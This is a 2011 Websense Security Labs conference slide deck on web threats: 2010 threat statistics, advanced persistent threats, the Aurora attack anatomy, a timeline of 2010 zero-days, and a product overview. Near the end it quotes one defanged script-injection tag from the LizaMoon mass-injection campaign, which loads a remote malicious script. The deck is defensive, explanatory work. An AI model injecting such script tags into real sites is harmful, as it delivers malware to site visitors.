Challenges In The Morphing Threat Landscape

Apr 2011, Arnhem

Tamas Rudnai, Websense Security Labs

Agenda

How Has The Threat Landscape Changed?

Advanced Persistent Threats

Web 2.0

Blended Threats

Websense Security Labs

Something has Changed

Rich Internet Applications

Cloud Computing

Social Web

Threat Report 2010

111% increase in number of malicious websites from 2009 to 2010

80% of malicious sites we see were legitimate

Since April ‘10, the ThreatSeeker Network has identified between 1 and 2 million malicious sites per month

Threat Report 2010...continued

52% of web-based attacks are data-stealing

9 out of 10 unwanted emails contain a URL

84% of email messages were spam

More info: http://www.websense.com/threatreport2010

Top Compromised Site Categories

Business and Economy: 24.30%

Travel: 8.20%

Sex: 6.80%

Sports: 5.80%

Education: 5.80%

Advanced Persistent Threats

APT

Advanced: They know what they are doing!

Persistent: They have a mission.

Threats: They are funded, motivated, organized, and connected

“Aurora” Timeline

February 23: Intel confirms “sophisticated” attacks coinciding with Google’s

Week of February 22: 200+ sites use the exploit to deliver other malware**

January 21: Microsoft patch released. Only 26% of AV vendors offer protection*

January 16: Exploit code available

January 14: 0-day identified publicly

January 12: Google announcement

Sites Compromised: 9 Days

Nov-Dec, 2009: Multiple phishing attacks

* Independent firm, Virus Total

** Websense Security Labs

Anatomy of Aurora

1. Exploit code posted to target and Web 2.0 enabled sites

2. Spoofed emails sent to target companies with URL lure to infected Web site

3. Employees clicked on lures in emails and on social networking sites and became infected

4. Infected machines sent sensitive information via the Web to host Web sites

[Diagram labels: Corporate Network; AV & URL Filters; Email & URL Filters; Email Filters]

0-day Timeline

[Timeline figure: 2010, June to September]

Total of 79 Days of vulnerable software and counting…

Days to patch shown on the timeline: 6 (Adobe Flash), 25 (Adobe Acrobat Reader), 15, 9, 17, 7, 27

Vulnerabilities shown on the timeline:

Adobe Flash and Acrobat Reader CVE-2010-1297

Microsoft LNK Vulnerability CVE-2010-2568

JailbreakMe drive-by attacks on iOS

Apple QuickTime “_MARSHALES_PUNK” 0-day CVE-2010-1818

Adobe Flash CVE-2010-2884

Adobe Acrobat Reader CVE-2010-2883

Modern Security for Modern Threats

ThreatSeeker Network

ACE protects customers against the most complex known and unknown threats in the areas of web exploits, Web 2.0, malware, data leakage, and real-time content classification in 95+ categories.

ACE: Composite Security Engine

PreciseID

Reputation

Anti-SPAM

Real-time Web 2.0 Classification

Real-Time Security Classification

URL Classification

Antivirus ++

• Fingerprints: Known Good, Known Bad

• Statistical: Machine Learning

• Logical: Regular Expressions

• Reputation: Contextual

• Correlation: Combining Analytics

All-purpose real-time analytics

All major content types supported

LizaMoon – Mass Injection

<script src=hxxp://lizamoon.com/ur.php></script>

Q & A

Thank You

Websense Security Labs’ Blog: http://securitylabs.websense.com/

@websenselabs: http://twitter.com/websenselabs

Keep in touch: http://twitter.com/trudnai
